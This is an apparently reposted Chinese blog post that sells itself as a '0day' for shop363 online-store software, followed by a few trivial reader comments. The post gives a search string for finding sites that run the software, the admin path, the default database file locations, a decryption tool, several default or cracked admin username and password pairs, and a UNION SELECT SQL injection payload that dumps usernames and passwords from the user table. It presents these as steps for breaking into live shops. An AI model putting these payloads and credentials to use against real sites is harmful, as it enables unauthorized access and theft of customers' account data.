shop363网店通杀0day

/ 11评 / 0

咋说呢,你让我咋说呢。

这个程序安全不是很好,不过其中的一个replace()函数写的很好,不过没有找到是怎么写的,将注射中的“空格、select、%20、+号、还有/**/等过滤为空。在搜索出存在漏洞语句很麻烦 ,我也不写了,直接来个釜底抽薪的方法,直接拿密码账号很快的。

 

关键字:技术支持:shop363.net

 

后台地址:/admin_shop363/

 

数据库:Data_Shop363/Date_Shop363_shop.mdb

数据库解密工具:AccessUnLock.exe

破解出账号:admin 密码:actionshop363?

 

备用数据库:

Data_Shop363/Date_Shop363_shop.mdb默认数据库

bbs/data/#sjyshop363.mdb论坛数据库

 

首页取回密码处注射漏洞(对拿Shell没有多大用,不过能爆出一些用户名密码)直接访问

‘union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from shop363_user

 

显示为7

 

依次换为username password

 

也可以使用后台默认密码:action first

第二组:admin admin888

第三组:admin admin(90%能直接进入后台)

fr0m:China Abin

==============================================

Ps:是他逼我转的,我是被逼的

11 responses to “shop363网店通杀0day”

  1. 孔国军 says:

    CCTV 我了个去。。。。。

  2. @Visper:你发这个字是什么字{smile:23}

  3. @Visper:我不知道!{smile:23}

  4. @旅行士吧:笑神马!{smile:40}

  5. @Visper:你发这个字是什么字{smile:23}

  6. Visper says:

    {smile:2}~~~~~~~~~~~甯

  7. @Visper:我不知道!{smile:23}

  8. Visper says:

    php的mysql_real_escape_string()函数安全不?

  9. @旅行士吧:笑神马!{smile:40}

Leave a Reply

Your email address will not be published. Required fields are marked *